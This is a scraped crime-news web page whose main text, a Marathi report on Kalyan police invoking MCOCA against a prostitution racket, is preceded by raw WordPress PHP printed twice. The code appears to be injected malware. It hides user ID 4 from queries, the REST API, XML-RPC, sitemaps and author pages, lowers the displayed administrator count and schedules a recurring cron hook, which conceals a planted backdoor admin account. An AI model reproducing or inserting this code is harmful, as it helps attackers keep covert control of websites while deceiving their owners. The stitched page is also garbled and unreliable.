add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
कल्याण रेल्वे स्टेशन परिसरातील देहव्यापाराच्या रॅकेटवर ‘मोक्का’चा फास - crimeaala.com
कल्याण: कल्याण रेल्वे स्टेशन परिसरात संघटित पद्धतीने सुरू असलेल्या अनैतिक वेश्याव्यवसायाच्या मोठ्या रॅकेटचा महात्मा फुले चौक पोलिसांनी पर्दाफाश करत महाराष्ट्र संघटित गुन्हेगारी नियंत्रण कायदा (मोक्का) अंतर्गत मोठी कारवाई केली आहे. या प्रकरणातील टोळीचा मुख्य सूत्रधार तौफिक उर्फ टोप्या हिमायत सय्यद याच्यासह एकूण ८ आरोपींना अटक करण्यात आली असून २० पीडित महिलांची सुटका करण्यात आली आहे.
तपासादरम्यान आरोपींनी संगनमत करून महिलांना पैशांचे आमिष दाखवत तसेच जबरदस्तीने देहव्यापारात ढकलल्याचे उघड झाले. ग्राहकांकडे महिलांना पाठवून मिळणाऱ्या पैशावर आरोपी उपजीविका करत असल्याचे तपासात स्पष्ट झाल्याने या संघटित टोळीविरुद्ध मोक्का कायद्याची कलमे लागू करण्यात आली.
या गुन्ह्यातील पाच महिला आरोपींना कारागृहातून ताब्यात घेऊन फेरअटक करण्यात आली. तसेच फरार आरोपी प्रशांत उर्फ कवा विरकुमार गायकवाड याला गुप्त माहिती व तांत्रिक तपासाच्या आधारे अटक करण्यात आली. दरम्यान, टोळीचा मुख्य आरोपी तौफिक उर्फ टोप्या सय्यद आणि फरार महिला आरोपी मिता नारायण बारीक हे पश्चिम बंगालमध्ये लपून बसल्याची माहिती मिळताच कल्याण पोलिसांचे विशेष पथक तातडीने रवाना करण्यात आले.
स्थानिक पोलिसांच्या मदतीने दोघांनाही ११ जुलै रोजी पश्चिम बंगालमधून ताब्यात घेऊन ट्रान्झिट वॉरंटवर कल्याण येथे आणण्यात आले. न्यायालयाने दोघांनाही १८ जुलैपर्यंत पोलीस कोठडी सुनावली आहे. या संपूर्ण कारवाईमुळे कल्याण परिसरात संघटित देहव्यापार करणाऱ्या टोळीला मोठा धक्का बसला असून महिलांच्या तस्करी आणि अनैतिक व्यापाराविरोधात ठाणे शहर पोलिसांनी कठोर भूमिका घेतल्याचे पुन्हा एकदा स्पष्ट झाले आहे.
ही धडक कारवाई पोलीस आयुक्त आशुतोष डुंबरे, सहपोलीस आयुक्त ज्ञानेश्वर चव्हाण, अपर पोलीस आयुक्त संजय जाधव यांच्या मार्गदर्शनाखाली परिमंडळ-३ चे पोलीस उपायुक्त अतुल झेंडे यांच्या देखरेखीखाली करण्यात आली. गुन्ह्याचा पुढील तपास सहाय्यक पोलीस आयुक्त अशोक होनमाने करीत आहेत.